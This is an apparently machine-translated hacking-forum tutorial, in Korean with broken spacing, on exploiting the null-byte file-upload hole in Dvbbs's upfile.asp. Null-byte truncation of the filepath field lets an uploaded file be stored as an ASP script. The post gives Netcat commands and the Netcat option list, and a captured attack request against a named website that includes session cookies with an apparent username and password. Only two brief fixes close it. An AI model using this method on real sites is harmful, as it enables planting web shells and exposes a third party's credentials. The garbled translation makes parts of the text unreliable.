asp 업로드 구멍 종결 편

업로드 구멍 에 관 한 글 을 소장 하고 있 습 니 다.최근 에 이 문 제 를 겪 고 있 습 니 다.  블랙 호크 기지 포럼http://www.3800cc.com 1.앞 에***이 업로드 구멍 을 이용 하 는 원 리 는 form 형식 으로 업로드 한 asp 와 phop 스 크 립 트**NC(Netcat)에 만 사 용 됩 니 다. 패 킷 DOS 인터페이스 에서 실행:   NC -vv www.***.com 80<1.txt    -vv: 환현 하 다   80:  ww 포트   1.txt: 바로 당신 이 보 낼 패 킷 입 니 다.  (더 많은 사용법 은 이 지역 의 댓 글 을 보십시오)  WSE(WSockExpert)    이 컴퓨터 포트 에 대한 감시,IE 가 제출 한 패 킷 캡 처  (사용 하지 않 을 것 은 자신 이 인터넷 에서 자 료 를 검색 하 는 N 다)2.구멍 원리 아래 예 를 들 어 가설 한 전제 ww 호스트:  www.***.com; bbs 경로 :  /bbs/구멍 은 인터넷 파일 에 대한 연구 에서 비롯 되 었 습 니 다.일정한 프로 그래 밍 경험 을 가지 고 Dvbbs 의 upfile.asp 파일 을 보 는 것 을 권장 합 니 다.upfile 이 form 표를 만들어 업로드 하 는 것 을 모두 이해 할 필요 가 없습니다.사용 하 는 변수:filepath 기본 값 uploadpace 속성 hiden act      기본 값 업로드     속성 hiden file 1    니 가 보 낼 그 파일 의 관건 은 filepath 이 변수!기본적으로 우리 의 파일 이 www.***.com/bbs/uploadpace/파일 에 올 라 가 는 것 은 당신 의 업로드 시간 으로 명 명 된 것 입 니 다.바로 upfile 에 있 는 이 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&". data[]="bbs"이 data 배열 의 길 이 는 4:입 니 다. b b s \0 만약 우리 가 filepath 를 다음 과 같이 구성한다 면 어떻게 될까요?filepath="/new mm.asp\0"우리 가 2004.09.2.4.08.24 에서 보 낸 파일 이 바 뀌 지 않 을 때:http://www.***.com/bbs/uploadpace/200409240824.jpg 우리 가 만 든 filepath 를 사용 할 때:http://www.***.com/newmm.asp\\0/200409240824.jpg 이렇게 서버 가 filepath 데 이 터 를 받 을 때,new mm.asp 뒤의\0 을 감지 하면 filepath 로 이해 되 는 데이터 가 끝 납 니 다.예 를 들 어 c:\1.asp 는 다음 과 같이 저 장 됩 니 다. http://www.***.com/new mm.asp 3.후기 에 구멍 을 보충 하여 발표 한 후에 많은 사이트 들 이 해당 하 는 처 리 를 했 지만 filepath 에 대한 여과 와 처리 가 안 되 었 습 니 다.많은 사이트 들 이 N 개의 hiden 속성 변 수 를 추가 하여 인터넷 에 공 개 된 upfile.exe 는 바로 구멍 을 올 리 는 도구 나 filepath 변 수 를 이용 하 는 도구(노병 의)입 니 다.그러나 가장 기본 적 인 것 은 바 뀌 지 않 았 습 니 다.그리고 사이트 의 플러그 인 에 비슷 한 구멍 이 있 습 니 다.제 가 말 하고 자 하 는 것 은 어떤 전문 적 인 도구 에 의존 하지 마 세 요.  WSE 가 잡 은 가방 에 있 는 filepath 변 수 를 직접 바 꾸 고 NC 로 제출 합 니 다...그 가 N 개의 hiden 변 수 를 추가 하 더 라 도 도움 이 되 지 않 는 다.물론 filepath 에 대해 엄격 한 필 터 를 한다 면 우리 의 이러한 이론 들 은 종결 을 알 리 는 것 이 우리 의 새로운 이론 이 탄생 할 때 입 니 다!넷,구멍 목록http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 외부 호스트 감청         NC [-options] hostname port[s] [ports] ... 로 컬 호스트 감청        NC -l -p port [options] [hostname] [port] options:         -d              detach from console, stealth mode         -e prog         inbound program to exec [dangerous!!]         -g gateway      source-routing hop point[s], up to 8         -G num          source-routing pointer: 4, 8, 12, ...         -h              this cruft         -i secs         delay interval for lines sent, ports scanned         -l              listen mode, for inbound connects         -L              listen harder, re-listen on socket close         -n              numeric-only IP addresses, no DNS         -o file         hex dump of traffic         -p port         local port number         -r              randomize local and remote ports         -s addr         local source address         -t              answer TELNET negotiation         -u              UDP mode         -v              verbose [use twice to be more verbose]         -w secs         timeout for connects and final net reads         -z              zero-I/O mode [used for scanning] port numbers can be individual  or ranges: m-n [inclusive 상세 한 실례:--------------------------------------------------------------------------------------------------- /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 업로드 form-data; name="filepath" /newmm.asp                 <===이 검은색 은 빈 칸 을 의미 합 니 다. 0x 20,0x 00 으로 바 꾸 면 됩 니 다. -vv www.xin126.com 80 <1.txt UltraEdit 는 16 비트 편집기 로 인터넷 에서 다운로드 할 수 있 습 니 다.우 리 는 주로 그 끝 표 시 를 쓸 수 있 습 니 다. \0 ====>16 위 는 0x 00 이나 00H 는 사실 고 칠 때 바로 filepath 의 끝 에 있 습 니 다.  에 00 을 추가 하면 OK.cookies 길 이 를 계산 합 니 다==>fillepath 를 바 꾼 후에 틀림없이+또는 cookies 의 길이 가 바 뀌 었 을 것 입 니 다.Host: www.xin126.com Content-Length: 1969  <======바로 이 연결: Keep-Alive Cache-Control: no-cache...계산 회 죠?하나의 자모,숫자 는 바로 1 업로드 구멍 에 대한 해결 방향 이다.(참고 만 제공)1.일반적인 업 로드 는 업로드 경 로 를 하나의 변수 로 처리 하 는 것 이다.==>우리 의 대책 은 filepath 를 상수 로 바 꾸 는 것 이다.이 방법 은 현재 가장 효과 적 이 라 고 생각한다.  2.\0 에 대한 처 리 를 강화 합 니 다.원래 우 리 는 여기까지 읽 으 면 끝 납 니 다.우 리 는 다음 변 수 를 계속 읽 고 시작 하 는 곳 에서 처리 하면 OK 입 니 다.